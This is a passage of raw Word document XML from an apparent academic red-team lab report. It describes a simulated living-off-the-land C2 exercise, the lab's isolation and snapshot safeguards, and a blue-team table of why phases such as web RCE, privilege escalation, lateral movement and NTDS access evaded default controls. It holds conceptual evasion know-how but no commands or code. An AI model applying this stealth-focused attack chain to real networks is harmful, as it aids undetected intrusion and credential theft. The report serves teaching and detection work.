        <w:t>Sliver is a simulated C2 architecture to showcase topics like stealth and evasion without actually putting covert infrastructure into an academic lab. We focus on living-off-the-land approaches leveraging built-in binaries like PowerShell and WMI in lieu of releasing custom malware because they mimic the tradecraft that made the original M&amp;S/Co-op incursion difficult to detect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F547DA" w14:textId="021430CC" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.6 Operational Execution, Stealth and Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="50CC4923" w14:textId="77777777" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc234776733"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution focused on realistic operator activity, reducing noisy scans, choosing valid credentials and built-in tooling over overt exploits for once inside, and staging exfiltration over an existing channel. Each phase was supported with screenshots, sanitised command logs and packet captures that make up the lab export and proof package. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>trade off</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between stealth and speed is evident – a real attacker would move slowly to elude a SIEM, while a time boxed test balances thoroughness against noise, this balance is stated every step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB1B956" w14:textId="1C10EFCD" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.7 Containment and Safety</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="6E33283B" w14:textId="77777777" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⦁</w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> There is no default route configured in routing/interface. The whole lab is running on host only network and is isolated from the internet or any other network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F0A81B" w14:textId="77777777" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B" w:rsidP="00B8582B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>All 3 VMs and the attacker VM have been snapshotted before any intrusive step. The rollback strategy is to restore these snapshots after the completion, or when the ABORT-LAB kill switch is invoked.</w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="_Toc234776734"/>
    </w:p>
    <w:p w14:paraId="4C6FDA47" w14:textId="77777777" w:rsidR="00484DB7" w:rsidRPr="00796916" w:rsidRDefault="00484DB7" w:rsidP="00B8582B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196CDEE7" w14:textId="2E31ED78" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B" w:rsidP="00B8582B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>No real personal data in the environment, only a single created marker record as the exfiltration target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A181E32" w14:textId="0A69D714" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.8 Technical Report — Detection Gap Analysis (Blue Team)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="4A4B45CC" w14:textId="2D96E89E" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00484DB7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>This study, for each phase in the chain, shows why default controls would likely have failed to identify or prohibit the activity, and what telemetry would have closed the gap.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1021"/>
        <w:gridCol w:w="4055"/>
        <w:gridCol w:w="4284"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="17ABD2E4" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="44C17096" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C08FD4A" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Why it evaded detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FE9CEB6" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Detection that would have caught it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="36C3F607" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35C64634" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web RCE (VM-2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="127FF669" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Perimeter web app lacked a WAF and request-anomaly logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="521CD27D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WAF with virtual patching; alerting on anomalous POST/upload requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="0C101220" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16C2449C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Priv-esc (VM-2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35CED4E3" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Local escalation via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>misconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> leaves few network signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AC9D57D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>File-integrity and host-based detection on privilege changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="6F290E36" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F9416D0" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lateral move</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4F3C0473" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Use of valid credentials looks like legitimate authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4284" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C839647" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Identity analytics flagging first-time / off-hours access to the DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="1BA56340" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15132774" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1ADD4E1B" w14:textId="18FCBCB8" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00484DB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
